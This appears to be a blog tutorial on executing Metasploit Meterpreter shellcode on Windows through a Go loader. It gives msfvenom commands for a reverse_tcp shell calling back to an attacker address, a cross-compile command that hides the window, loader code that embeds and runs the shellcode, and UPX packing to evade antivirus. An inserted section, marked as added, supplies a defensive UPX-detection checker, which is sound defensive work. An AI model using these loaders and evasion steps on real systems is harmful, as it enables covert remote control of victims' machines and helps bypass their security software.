
Go can be used by ethical hackers to run shellcode generated by Metasploit. That means you can use msfvenom to create shellcode and have a Go program execute it. For this tutorial, I am using the go-shellcode project by brimstone on GitHub.

First, make sure your root user on Kali can run the go binary.

As root, try to run the go binary. If that fails, you should probably add export PATH=$PATH:/usr/local/go/bin to /etc/profile and then run source /etc/profile.

Now generate the shellcode using msfvenom and compile the program. Use the program brimstone made in his repo. I build it with the command: GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -H=windowsgui" main.go.

You need to run the compile command from the module's cmd/sc directory: root@kali:/home/kali/go/pkg/mod/github.com/brimstone/[email protected]/cmd/sc# GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -H=windowsgui" main.go

Want to learn more ethical hacking? I highly recommend buying my book for beginners to pentesting, Become An Ethical Hacker. Check the price on Amazon.


Generate Meterpreter Shellcode

Now generate the shellcode with: msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o revshell.hex LHOST=10.0.0.197 LPORT=4444 and pass the resulting hex to scme.exe. That pops open a fresh Meterpreter shell.

Notice that the Meterpreter shellcode is for the x64 arch; this is a requirement. The most reliable way to do this is to pass the hex code to the compiled Go program on the target. It is not the stealthiest approach, but it demonstrates that it is possible. Use the command scme.exe {hexcode} to run the shellcode.

Option #2: Run Shellcode As A Variable

Option #2 is to keep everything on Kali Linux. That means you embed the shellcode in the Go program instead of feeding it to the compiled program as in the first option. You have to make some modifications to the code in order to make it work this way.

package main

import (
        "encoding/hex"
        "fmt"

        shellcode "github.com/brimstone/go-shellcode"
)

func main() {
        // Paste the hex output of msfvenom here (the command in braces is the one that produces it).
        sc := "HEX SHELLCODE {msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o revshell.hex LHOST=10.0.0.197 LPORT=4444}"

        // Decode the hex string into raw bytes. On a decode error, stop here rather than
        // handing an empty buffer to the runner (the original fell through to shellcode.Run).
        scBin, err := hex.DecodeString(sc)
        if err != nil {
                fmt.Println("exiting!")
                return
        }

        shellcode.Run(scBin)
}

This will work to open a new Meterpreter session as well, but it is not stable and will die shortly after.

Antivirus Evasion

You can use upx to pack the program to attempt to avoid antivirus detection. Try packing it with upx; this reduces the file size to around 500 KB.
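The defender-side counterpart to that packing step, added here and not part of this post or the go-shellcode project: a small Go checker that parses a PE file's section table by hand and flags the section names UPX writes by default (UPX0, UPX1, UPX2). It assumes stock UPX naming and uses a constructed header as sample input, so it runs without a real binary.

```go
package main
import ("encoding/binary"; "fmt"; "strings")

// peSectionNames walks a PE header by hand (MZ stub -> e_lfanew -> COFF header -> section table).
func peSectionNames(img []byte) ([]string, error) {
	if len(img) < 0x40 || string(img[:2]) != "MZ" {
		return nil, fmt.Errorf("not an MZ/PE image")
	}
	peOff := int(binary.LittleEndian.Uint32(img[0x3c:])) // e_lfanew
	if peOff < 0 || peOff+24 > len(img) || string(img[peOff:peOff+4]) != "PE\x00\x00" {
		return nil, fmt.Errorf("bad PE signature")
	}
	nSec := int(binary.LittleEndian.Uint16(img[peOff+6:]))                 // NumberOfSections
	secTab := peOff + 24 + int(binary.LittleEndian.Uint16(img[peOff+20:])) // skip SizeOfOptionalHeader
	if secTab+nSec*40 > len(img) {
		return nil, fmt.Errorf("truncated section table")
	}
	names := make([]string, nSec)
	for i := range names { // 40-byte section headers, 8-byte NUL-padded name first
		names[i] = strings.TrimRight(string(img[secTab+i*40:secTab+i*40+8]), "\x00")
	}
	return names, nil
}

// isUPXPacked flags UPX's default section names (UPX0, UPX1, UPX2); renamed sections defeat it.
func isUPXPacked(names []string) bool {
	for _, n := range names {
		if strings.HasPrefix(n, "UPX") { return true }
	}
	return false
}

// buildFakePE builds a minimal PE header as constructed test data (not an executable).
func buildFakePE(secs []string) []byte {
	img := make([]byte, 0x40+4+20) // MZ stub, "PE\0\0", empty COFF header (no optional header)
	copy(img, "MZ")
	binary.LittleEndian.PutUint32(img[0x3c:], 0x40) // e_lfanew
	copy(img[0x40:], "PE\x00\x00")
	binary.LittleEndian.PutUint16(img[0x46:], uint16(len(secs))) // NumberOfSections
	for _, s := range secs { // one 40-byte section header per name
		img = append(img, make([]byte, 40)...)
		copy(img[len(img)-40:], s)
	}
	return img
}

func main() {
	names, err := peSectionNames(buildFakePE([]string{"UPX0", "UPX1", ".rsrc"}))
	fmt.Println(names, isUPXPacked(names), err) // [UPX0 UPX1 .rsrc] true <nil>
}
```

Section names are a cheap triage signal only; a packer run with renamed sections, or any other packer, needs entropy or unpacking-based checks instead.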

That’s all there is to it.
